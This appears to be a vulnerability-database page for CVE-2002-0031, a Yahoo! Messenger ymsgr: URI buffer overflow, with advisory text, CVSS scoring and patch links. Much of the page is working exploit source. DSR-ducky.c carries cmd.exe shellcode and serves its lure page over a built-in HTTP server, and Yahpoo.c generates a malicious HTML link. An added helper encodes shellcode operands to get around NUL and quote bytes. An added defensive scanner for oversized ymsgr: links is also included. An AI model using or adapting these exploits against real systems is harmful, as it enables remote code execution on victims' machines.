CVE-2002-0031
CVSS 4.6
Published: 2002-07-26 00:00:00
Revised: 2008-09-05 16:26:59

[Original] Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allow remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend.


[CNNVD] Yahoo! Messenger Call Center Remote Buffer Overflow Vulnerability (CNNVD-200207-124)

        
        Yahoo! Messenger is an instant messaging client.
        The 'Call Center' feature of Yahoo! Messenger has a flaw that lets a remote attacker trigger a buffer overflow.
        When Yahoo! Messenger is installed it registers a handler for the 'ymsgr:' URI scheme; on Windows 98 this is the registry key HKEY_LOCAL_MACHINE\Software\CLASSES\ymsgr\shell\open\command with the default value "YPAGER.EXE %1". The handler runs YPAGER.EXE, which accepts parameters such as 'call' to start the 'Call Center' feature.
        Any URL beginning with "ymsgr:" is therefore handed to ypager.exe, but the ymsgr protocol handler does not bounds-check its arguments. An attacker can build a web page whose YIM links ("call", "sendim", "getimv", "chat", "addview", "addfriend") carry malicious data; when a Yahoo! Messenger user follows such a link the messenger client overflows a buffer, and carefully constructed data can execute arbitrary instructions on the client system with the privileges of the messenger process.
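The six verbs listed above are reachable from any web page or e-mail that carries a ymsgr: link, so a content filter can flag oversized arguments before they ever reach ypager.exe. The following C program is an added example and is not part of the CNNVD entry or of the exploits on this page: it extracts ymsgr: URIs from an HTML buffer, parses the verb and the argument, and flags the six listed verbs when the argument is at least 268 bytes, the length BID 4837 reports as corrupting the stack frame for 'call'. Applying that threshold to the other five verbs is an assumption of this example; the sample page it scans is constructed inline, and "profile" is a hypothetical verb used only to show that unlisted verbs are not flagged.

```c
/* Added example (not from the advisory or either exploit on this page):
 * scan an HTML or e-mail body for ymsgr: URIs and flag the ones whose
 * argument is long enough to trigger the overflow. 268 is the 'call'
 * threshold from BID 4837; using it for all six verbs is an assumption. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define YMSGR_UNSAFE_LEN 268

static const char *const vulnerable_verbs[] = {
    "call", "sendim", "getimv", "chat", "addview", "addfriend", NULL
};

struct ymsgr_uri {
    char verb[32];     /* lower-cased verb between "ymsgr:" and '?' */
    size_t arg_len;    /* bytes after '?' up to the closing delimiter */
    int vulnerable;    /* 1 when verb is listed and arg_len >= YMSGR_UNSAFE_LEN */
};

static int verb_is_listed(const char *verb)
{
    for (const char *const *v = vulnerable_verbs; *v; v++)
        if (strcmp(verb, *v) == 0) return 1;
    return 0;
}

/* Case-insensitive substring search (the scheme may be written YMSGR:). */
static const char *find_ci(const char *hay, const char *needle)
{
    size_t n = strlen(needle), i;
    for (; *hay; hay++) {
        for (i = 0; i < n && hay[i] &&
             tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]); i++)
            ;
        if (i == n) return hay;
    }
    return NULL;
}

/* Parse one URI whose body starts at p (just past "ymsgr:"). Inside a quoted
 * attribute the matching quote ends the argument; otherwise whitespace, '>'
 * or a quote does. Returns the position to resume scanning from. */
static const char *parse_ymsgr(const char *p, char quote, struct ymsgr_uri *out)
{
    size_t i = 0;
    memset(out, 0, sizeof *out);
    while (isalpha((unsigned char)*p) && i < sizeof out->verb - 1)
        out->verb[i++] = (char)tolower((unsigned char)*p++);
    out->verb[i] = '\0';
    if (*p == '?') {
        for (p++; *p; p++, out->arg_len++) {
            unsigned char c = (unsigned char)*p;
            if (quote ? c == (unsigned char)quote
                      : (isspace(c) || c == '>' || c == '"' || c == '\''))
                break;
        }
    }
    out->vulnerable = verb_is_listed(out->verb) && out->arg_len >= YMSGR_UNSAFE_LEN;
    return p;
}

/* Scan html; store up to max parsed URIs in results, count all of them in
 * *found, and return how many would trigger the overflow. */
int scan_html_for_ymsgr(const char *html, struct ymsgr_uri *results, size_t max, size_t *found)
{
    int flagged = 0;
    const char *p = html;
    *found = 0;
    while ((p = find_ci(p, "ymsgr:")) != NULL) {
        struct ymsgr_uri u;
        char quote = (p > html && (p[-1] == '"' || p[-1] == '\'')) ? p[-1] : 0;
        p = parse_ymsgr(p + 6, quote, &u);
        if (*found < max) results[*found] = u;
        (*found)++;
        flagged += u.vulnerable;
    }
    return flagged;
}

/* Constructed sample page (not a captured one): a benign IM link, a 'call'
 * link with a 300-byte argument like the exploits on this page, a short
 * 'addview' link, and a 300-byte argument on "profile", a hypothetical verb
 * that is not in the reported list. Returns the number of URIs written. */
int build_sample_page(char *buf, size_t cap)
{
    char big[301], mid[101];
    int n;
    memset(big, 'A', 300); big[300] = '\0';
    memset(mid, 'B', 100); mid[100] = '\0';
    n = snprintf(buf, cap,
        "<html><body>\n"
        "<a href=\"ymsgr:sendim?friend\">send IM</a>\n"
        "<IFRAME SRC=\"YMSGR:call?%s\">call</IFRAME>\n"
        "<a href='ymsgr:addview?%s'>view</a>\n"
        "<a href=\"ymsgr:profile?%s\">profile</a>\n"
        "</body></html>\n", big, mid, big);
    return (n > 0 && (size_t)n < cap) ? 4 : -1;
}

/* Runs the scanner over the sample and returns the flagged count. */
int demo_flagged(void)
{
    char page[2048];
    struct ymsgr_uri r[8];
    size_t found;
    if (build_sample_page(page, sizeof page) != 4) return -1;
    return scan_html_for_ymsgr(page, r, 8, &found);
}

/* Returns 1 if every parsed entry matches the constructed sample. */
int demo_entries_ok(void)
{
    char page[2048];
    struct ymsgr_uri r[8];
    size_t found;
    build_sample_page(page, sizeof page);
    scan_html_for_ymsgr(page, r, 8, &found);
    return found == 4
        && strcmp(r[0].verb, "sendim") == 0 && r[0].arg_len == 6 && !r[0].vulnerable
        && strcmp(r[1].verb, "call") == 0 && r[1].arg_len == 300 && r[1].vulnerable
        && strcmp(r[2].verb, "addview") == 0 && r[2].arg_len == 100 && !r[2].vulnerable
        && strcmp(r[3].verb, "profile") == 0 && r[3].arg_len == 300 && !r[3].vulnerable;
}

int main(void)
{
    printf("flagged=%d entries_ok=%d\n", demo_flagged(), demo_entries_ok());
    return (demo_flagged() == 1 && demo_entries_ok()) ? 0 : 1;
}
```

Only the 'call' link is flagged: the argument length is measured inside the attribute quotes, so the 300-byte 'profile' argument and the 100-byte 'addview' argument pass. Adjust YMSGR_UNSAFE_LEN downward if you want a margin below the reported 268 bytes.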
        

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [reduced performance or interrupted access to resources]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is needed to exploit]

Note: NVD's v2 vector rates the access vector LOCAL, although every description on this page (CNNVD, BID, EDB) describes a remote trigger: the victim only has to open a web page or e-mail that carries the ymsgr: link.

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0031
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0031
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-124
(Official data source) CNNVD

- Other links and resources

http://www.cert.org/advisories/CA-2002-16.html
(VENDOR_ADVISORY)  CERT  CA-2002-16
http://www.kb.cert.org/vuls/id/137115
(UNKNOWN)  CERT-VN  VU#137115
http://www.securityfocus.com/bid/4837
(VENDOR_ADVISORY)  BID  4837
http://online.securityfocus.com/archive/1/274223
(VENDOR_ADVISORY)  BUGTRAQ  20020527 Yahoo Messenger - Multiple Vulnerabilities

- Vulnerability information

Yahoo! Messenger Call Center Remote Buffer Overflow Vulnerability
Medium severity, boundary condition error
Published 2002-07-26 00:00:00, updated 2005-10-20 00:00:00
Remote
        Description: as in the CNNVD entry above.

- Advisories and patches

        Vendor patch:
        Yahoo!
        ------
        The vendor has released an upgrade that fixes this issue; download it from the vendor's site.
        Use Messenger 5.0 build 1065:
        Yahoo! Messenger 5.0:
        Yahoo! Upgrade Messenger 5.0 Build 1065
        
        http://download.yahoo.com/dl/installs/ymsgr/ymsgr_1065.exe

- Vulnerability information (45)

Yahoo Messenger 5.5 Remote Exploit (DSR-ducky.c) (EDBID:45)
Platform: windows  Type: remote
Date: 2003-06-23  Verified
Port: 80  Author: Rave
N/A
/* 
*
* ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]---
*
* Dtors Security Research (DSR)
* Code by: Rave
*
* The buffer looks like this
*
* |-<-<-<--|
* <Fillup x offset><JMP 0x3><EIP><NOPS><SHELLCODE>
* ^__________^ 
*
*
*/


#include <winsock2.h> /* must precede windows.h, which would otherwise pull in the old winsock.h */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib") /* Winsock import library (MSVC) */
#define MAXDATASIZE 555 /* Max number of bytes of data */
#define BACKLOG 200 /* Number of allowed connections */

static int port =80;

/* library entry inside msvcrt.dll to jmp 0xc (EB0C); */
char sraddress[8]="\x16\xd8\xE8\x77";

/* This shellcode just executes cmd.exe, nothing special here..
* the victim gets a cmd shell on his desktop :) lol !
*/

unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* NOP sled */
"\x8b\xec\x55\x8b\xec"      /* mov ebp,esp ; push ebp ; mov ebp,esp */
"\x68\x65\x78\x65\x20"      /* push "exe " */
"\x68\x63\x6d\x64\x2e"      /* push "cmd." -> "cmd.exe " now sits at [ebp-8] */
"\x8d\x45\xf8\x50"          /* lea eax,[ebp-8] ; push eax */
"\xb8\x44\x80\xbf\x77"      /* mov eax,0x77bf8044 <- address of system() (bytes are little-endian) */
"\xff\xd0";                 /* call eax -> system("cmd.exe ...") */



void Usage(char *programName)
{
printf("\n\t\t---------------------------------------------------\n");
printf("\t\t\t\tDtors Security Research (DSR) \n");
printf("\t\t\t\tCode by: Rave\n");
printf("\t\t\t\tMail: rave@dtors.net\n");
printf("\t\t---------------------------------------------------\n\n");


/* Modify here to add your usage message when the program is
* called without arguments */
printf("\t\t---------------------------------------------------\n\n");
fprintf(stdout,"\t\t-P local webserver server portnumber\n");
fprintf(stdout,"\t\t-g greatz to:\n\n\n\n\n");
printf("\t\t---------------------------------------------------\n\n");

}

/* returns the index of the first argument that is not an option; i.e.
does not start with a dash or a slash
*/
int HandleOptions(int argc,char *argv[])
{
int i,firstnonoption=0;

for (i=1; i< argc;i++) {
if (argv[i][0] == '/' || argv[i][0] == '-') {
switch (argv[i][1]) {
/* An argument -? means help is requested */
case '?':
Usage(argv[0]);
break;
case 'P':
if (i+1 < argc) port=atoi(argv[++i]); break; /* -P needs a value; do not read past argv */
case 'H':
if (!stricmp(argv[i]+1,"help")) {
Usage(argv[0]);
break;
}
/* If the option -h means anything else
* in your application add code here
* Note: this falls through to the default
* to print an "unknow option" message
*/
/* add your option switches here */
default:
fprintf(stderr,"unknown option %s\n",argv[i]);
break;
}
}
else {
firstnonoption = i;
break;
}
}
return firstnonoption;
}

int main(int argc,char *argv[])
{
FILE *fptr;
unsigned char buffer[5000];
int offset=320; // <-- the offset of the buffer = 320 x NOP; (at 321 we begin the instruction pointer change)
int fd,fd2 ,i,numbytes,sin_size; /* files descriptors */

char sd[MAXDATASIZE]; /* sd will store send text */

struct sockaddr_in server; /* server's address information */
struct sockaddr_in client; /* client's address information */
struct hostent *he; /* pointer for the host entry */


WSADATA wsdata;
WSAStartup(0x0101,&wsdata);


if (argc == 1) {
/* If no arguments we call the Usage routine and exit */
Usage(argv[0]);
return 1;
}

HandleOptions(argc,argv);
fprintf(stdout,"Creating index.html: ");
if ((fptr =fopen("index.html","w"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Done\n");
}

// zero the buffers, then fill the first `offset` bytes with NOPs
memset(sd,0x00,MAXDATASIZE);
memset(buffer,0x00,offset+32+strlen(shellcode));
memset(buffer,0x90,offset);


// we place a short jmp (EB 03) inside the buffer
// to jump over the EIP-changing bytes at the end of the fill
//
// <fillup x offset>jmp 0x3<eip><NOPS><shellcode>
// |____________^
buffer[offset-4]=0xeb;
buffer[offset-3]=0x03;

memcpy(buffer+offset,sraddress,4); // overwrites the saved return address
memcpy(buffer+offset+4,shellcode,strlen(shellcode)); // strlen() stops at the first 0x00, so the stub must be NUL-free


// here we make the index.html
// we open it again if someone connects to the exploiting server
// and send it over to the victim.

fprintf(fptr,"<!DOCTYPE HTML PUBLIC %c-//W3C//DTD HTML 4.0 Transitional//EN%c>",0x22,0x22);
fprintf(fptr,"<html>");
fprintf(fptr,"<title>Oohhh my god exploited</title>\n");
fprintf(fptr,"<body bgcolor=%cblack%c>",0x22,0x22);
fprintf(fptr,"<body>");
fprintf(fptr,"<font color=%c#C0C0C0%c size=%c2%c face=%cverdana, arial, helvetica, sans-serif%c>",
0x22,0x22,0x22,0x22,0x22,0x22);
fprintf(fptr,"<B>Dtors Security Research (DSR)</B>\n");
fprintf(fptr,"<p>Yah000 Messager Version 5.5 exploit....</p>\n");
fprintf(fptr,"<pre>");
fprintf(fptr,"<IFRAME SRC=%cymsgr:call?%s%c>Contact heaven</html></body>",0x22,buffer,0x22); /* buffer goes through %s: it must contain no 0x00 and no '"' */
fprintf(fptr,"<IFRAME SRC=%chttp://www.boothill-mc.com/images/skull-modsm_01.gif%c>....</html></body>",0x22,0x22);

fclose(fptr); // <-- closing index.html again


// Some extra debuging information
fprintf(stdout,"Using port: %d\n",port);
fprintf(stdout,"\nStarting server http://localhost:%d: ",port);

if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */
printf("socket() error\n");
exit(1);} else {
fprintf(stderr,"Done\n");
}


server.sin_family = AF_INET;
server.sin_port = htons(port);
server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */
memset(server.sin_zero,0,8); /* zero the rest of the structure*/


if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1){
/* calls bind() */
printf("bind() error\n");
exit(-1);
}

if(listen(fd,BACKLOG) == -1){ /* calls listen() */
printf("listen() error\n");
exit(-1);
}

while(1){
sin_size=sizeof(struct sockaddr_in);
if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size))==-1){
/* calls accept() */
printf("accept() error\n");
exit(1);
}

if ((he=gethostbyname(inet_ntoa(client.sin_addr)))==NULL){
printf("gethostbyname() error\n");
exit(-1);
}

printf("You got a connection from %s (%s)\n",
inet_ntoa(client.sin_addr),he->h_name);
/* prints client's IP */


fprintf(stdout,"\nOpening index.html for remote user: ");
if ((fptr =fopen("index.html","r"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Done\n");
}

fprintf(stdout,"Sending the overflow string... ");


// reading the index.html file and sending its
// contents to the connected victim

// read index.html and send its contents to the connected victim.
// No HTTP headers are sent: the client has to accept a raw (HTTP/0.9-style) body.
while ((numbytes = (int)fread(sd, 1, MAXDATASIZE - 1, fptr)) > 0) {
sd[numbytes] = '\0'; // one byte of sd is reserved for the terminator
send(fd2, sd, numbytes, 0);
}
fclose(fptr);


printf("\n\n\nExploit Done....\n\n\n");
printf("A shell is started @ %s :) lol\n\n\nPress any key to exit the exploit",inet_ntoa(client.sin_addr));

fgets(sd, MAXDATASIZE, stdin); /* bounded read instead of gets() */
closesocket(fd2);
closesocket(fd);
WSACleanup();
exit(0);
}

return 0;
}


// milw0rm.com [2003-06-23]
		

- Vulnerability information (21484)

Yahoo! Messenger 5.0 Call Center Buffer Overflow Vulnerability (EDBID:21484)
Platform: windows  Type: remote
Date: 2002-05-27  Verified
Port: 0  Author: bob
N/A
source: http://www.securityfocus.com/bid/4837/info

Yahoo! Messenger configures the 'ymsgr:' URI handler when it is installed. The handler invokes YPAGER.EXE with the supplied parameters. YPAGER.EXE accepts the 'call' argument; it is used for starting the 'Call Center' feature.

There is a stack overrun condition in the 'Call Center' component that may be exploited through a specially constructed URI. It has been reported that the stack frame of the affected function will be corrupted if the argument to the 'call' parameter passed to YPAGER.EXE is of 268 bytes or greater in length.

Attackers may exploit this vulnerability to execute arbitrary code. 

/* Yahpoo.c by bob@dtors.net  [www.dtors.net] [DSR]
 *
 * Why Yahoo Messenger has not fixed this vulnerability
 * I don't know...but either way they are stupid!
 * 
 * This exploit has been tested on:
 * Yahoo Messenger 5,5,0,1246
 * Yahoo Module 5,5,0,454
 * 
 * For:
 * Windows 2000 Professional 5.0.2195 SP3
 *
 * Rave@dtors.net has released a windows [exe] version of this
 * exploit but for Windows XP Pro SP1. 
 * So both targets are vulnerable XP/2k...some addresses might need changing.
 *
 * Problems that may occur:
 * 
 * The addresses used may vary from box to box..so they might need changing.
 * The stack may keep on changing the location of your shellcode address..you
 * need to hit a static sector that will not alternate. [this is the reason we jmp]
 * There exist two crashes...the first one we bypass..this is the access violation
 * when you hit the nop sled the first time round. The second crash is where we 
 * hit the nop sled...so don't get confused between the 2.
 *
 * The shellcode used here...will not do anything malicious..just opens a popup box
 * You can change this shellcode to something else...but the buffer is not very big
 * so there is no chance of a bind shell or anything.
 * Sloth from nopninjas.com has a shellcode that will download a trojan
 * and execute it. Nice and small as well ;)
 *
 * That's about it...this exploit will lead to remote command execution on the
 * victim. Bear in mind this is triggered via bad URI handling...and the victim
 * needs to actually view the evil html file..this can be done automatically via
 * email >:)
 *
 * Big Lovin to rica.
 * Thanks to rave for his time.
 * Greetz:
 * mercy, Redg, opy, phreez, eSDee, ilja, looney, The_itch, angelo, inv, kokanin,
 * macd, SiRVu|can, Sally, Lucipher, gloomy, phaze, uproot, b0f.
 * special thanks to sloth@nopninjas
 *
 * 
 * bob@dtors.net www.dtors.net
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h> 
#define MessageBoxA "\x1d\x97\x53\x01"


char ret[8]= "\xD5\x96\x7A\x01";


unsigned char win32_msgbox[] = {
    "\xEB\x19\x5E\x33\xC9\x89\x4E\x05\xB8" MessageBoxA  "\x2D\x01\x01"
    "\x01\x01\x8B\x18\x6A\x10\x56\x56\x51\xFF\xD3\xE8\xE2\xFF\xFF\xFF"
    "\x62\x6f\x62\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
};	

int main(int argc, char *argv[])
{
    FILE *evil;
    unsigned char *shellcode = win32_msgbox;
    unsigned char buffer[5000];
    int offset = 320;
    size_t sclen = strlen((const char *)shellcode); /* stops at the first 0x00 of the stub */

    fprintf(stdout, "\n\tYahPoo.c By bob.\n");
    fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5\n");
    fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n\n");

    fprintf(stdout, "Makin' da EbUL HTML File... ");
    if ((evil = fopen("yahoo.html", "w")) == NULL) {
        fprintf(stderr, "Failed\n");
        exit(1);
    } else {
        fprintf(stderr, "Opened!\n");
    }

    memset(buffer, 0x00, offset + 32 + sclen);
    memset(buffer, 0x90, offset);            /* NOP sled up to the overwrite point */

    memcpy(buffer + offset, ret, 4);
    memcpy(buffer + offset + 4, shellcode, sclen);

    buffer[264] = 0xD4;   // address of &shellcode
    buffer[265] = 0x96;
    buffer[266] = 0x7A;
    buffer[267] = 0x01;

    buffer[272] = 0xF5;   // jmp 0xc [msvcrt.dll]
    buffer[273] = 0x01;
    buffer[274] = 0x01;
    buffer[275] = 0x78;

    fprintf(evil, "<html>");
    fprintf(evil, "<title>Bought to you by dtors.net!</title>\n");
    fprintf(evil, "<B>Dtors Security Research (DSR)</B>\n");
    fprintf(evil, "<p>Yahoo Messenger 5.5 exploit....</p>\n");
    fprintf(evil, "<pre>");
    /* buffer is written with %s, so it must contain no 0x00 and no '"' before its end */
    fprintf(evil, "<a href=%cymsgr:call?%s%c>!EbUL Link!</a></body></pre></html>", 0x22, buffer, 0x22);
    fclose(evil); // <-- closing yahoo.html

    fprintf(stdout, "\nDa ebUL HTML file is >>yahoo.html<<\nEnjoy!\nwww.dtors.net\n\n");
    return 0;
} //end main
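Both exploits above copy their payload with strlen() and print it with %s into a quoted href or SRC attribute, so a 0x00 byte ends the payload and a quote character ends the URI. Yahpoo.c works around a NUL in the MessageBoxA import slot by storing slot+0x01010101 and subtracting the constant at run time (the B8 / 2D pair in win32_msgbox). The following C program is an added example and is not part of either exploit or of the advisory: it checks a byte string against those two delivery constraints and derives such an additive encoding for any 32-bit value. The function names are mine, and the slot value 0x0052961C is derived by subtracting 0x01010101 from the bytes in the MessageBoxA define; the page itself does not state it.

```c
/* Added example (not from the advisory or either exploit on this page):
 * delivery-constraint check and NUL-free encoding of a 32-bit operand,
 * matched against the stub in Yahpoo.c. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The Yahpoo.c stub as printed on this page, up to "bob\xff"; the zero
 * padding that follows in the original array never reaches the HTML because
 * the exploit copies the stub with strlen(). */
static const unsigned char yahpoo_stub[] = {
    0xEB,0x19,0x5E,0x33,0xC9,0x89,0x4E,0x05,
    0xB8,0x1D,0x97,0x53,0x01,            /* mov eax, slot + 0x01010101 */
    0x2D,0x01,0x01,0x01,0x01,            /* sub eax, 0x01010101 -> eax = slot */
    0x8B,0x18,0x6A,0x10,0x56,0x56,0x51,0xFF,0xD3,
    0xE8,0xE2,0xFF,0xFF,0xFF,
    0x62,0x6F,0x62,0xFF
};

/* Offset of the first byte that cannot survive fprintf("%s") inside an
 * attribute delimited by `quote`, or -1 if the payload is clean. */
long first_bad_byte(const unsigned char *p, size_t len, unsigned char quote)
{
    size_t i;
    for (i = 0; i < len; i++)
        if (p[i] == 0x00 || p[i] == quote) return (long)i;
    return -1;
}

int has_zero_byte(uint32_t v)
{
    int i;
    for (i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xffu) == 0) return 1;
    return 0;
}

static void put_le32(unsigned char *out, uint32_t v)
{
    int i;
    for (i = 0; i < 4; i++) out[i] = (unsigned char)(v >> (8 * i));
}

static uint32_t get_le32(const unsigned char *in)
{
    return (uint32_t)in[0] | ((uint32_t)in[1] << 8) | ((uint32_t)in[2] << 16) | ((uint32_t)in[3] << 24);
}

/* Smallest k of the form m*0x01010101 (1 <= m <= 255, so k itself has no
 * zero byte) such that v + k has no zero byte either; 0 if none exists. */
uint32_t nul_free_offset(uint32_t v)
{
    uint32_t m;
    for (m = 1; m <= 0xff; m++) {
        uint32_t k = 0x01010101u * m;
        if (!has_zero_byte(v + k)) return k;
    }
    return 0;
}

/* Emit "mov eax, v+k ; sub eax, k" (B8 imm32 / 2D imm32, 10 bytes), which
 * leaves v in eax without ever encoding v itself. Returns bytes written. */
size_t emit_load_eax(uint32_t v, unsigned char out[10], uint32_t *k_out)
{
    uint32_t k = nul_free_offset(v);
    if (k == 0) return 0;
    out[0] = 0xB8; put_le32(out + 1, v + k);
    out[5] = 0x2D; put_le32(out + 6, k);
    *k_out = k;
    return 10;
}

/* What eax holds after the 10-byte sequence (the CPU's view of the decode). */
uint32_t eval_load_eax(const unsigned char in[10])
{
    if (in[0] != 0xB8 || in[5] != 0x2D) return 0;
    return get_le32(in + 1) - get_le32(in + 6);
}

/* 1 if the emitter reproduces bytes 8..17 of the stub, i.e. the original
 * author's encoding of the derived import slot 0x0052961C. */
int stub_matches_page(void)
{
    unsigned char seq[10];
    uint32_t k;
    return emit_load_eax(0x0052961Cu, seq, &k) == 10
        && k == 0x01010101u
        && memcmp(seq, yahpoo_stub + 8, 10) == 0
        && eval_load_eax(seq) == 0x0052961Cu;
}

/* 1 if the stub passes the delivery check for a double-quoted href. */
int stub_is_deliverable(void)
{
    return first_bad_byte(yahpoo_stub, sizeof yahpoo_stub, '"') == -1;
}

/* Where a raw little-endian copy of v would break delivery (-1 if nowhere). */
long raw_first_bad_byte(uint32_t v)
{
    unsigned char raw[4];
    put_le32(raw, v);
    return first_bad_byte(raw, 4, '"');
}

int main(void)
{
    printf("raw slot breaks at byte %ld; stub matches page: %d; stub deliverable: %d\n",
           raw_first_bad_byte(0x0052961Cu), stub_matches_page(), stub_is_deliverable());
    return (stub_matches_page() && stub_is_deliverable()) ? 0 : 1;
}
```

The raw slot 0x0052961C fails at byte 3 (its high byte is 0x00), while the encoded form 0x0153971D / 0x01010101 is exactly what the stub carries. The same check applies to the return addresses the exploits patch in (0x017A96D4, 0x780101F5, 0x77E8D816): none of them may contain 0x00 or 0x22 either.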


		

- Vulnerability information

16016
Yahoo! Messenger ymsgr: Protocol Multiple Function Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-05-28 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Yahoo! Messenger Call Center Buffer Overflow Vulnerability
Boundary Condition Error  BID 4837
Remote: Yes  Local: No
Published 2002-05-27 12:00:00, updated 2009-07-11 01:56:00
Discovered by Phuong Nguyen <dphuong@yahoo.com>.

- Affected versions

Yahoo! Messenger 5.0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home

- Unaffected versions

Yahoo! Messenger 5.0 .1065

- Vulnerability discussion

Same text as the BID 4837 description quoted in the EDB 21484 entry above: a stack overrun in the 'Call Center' component, reached through the 'ymsgr:' handler, that corrupts the stack frame once the argument to 'call' is 268 bytes or longer.

- Exploit

The following proof of concept exploit has been supplied by Rave <rave@dtors.net> (DSR-ducky.c, listed under EDB 45 above):

- Solution

Yahoo has reportedly eliminated this vulnerability in Build 1065. It has been reported that a bug in the distribution mechanism may have caused Build 1036 to be installed on systems rather than Build 1065. This would leave unsuspecting users vulnerable. Users are advised to ensure that they are using 5,0,0,1065 and install it if they are not:


Yahoo! Messenger 5.0

- References
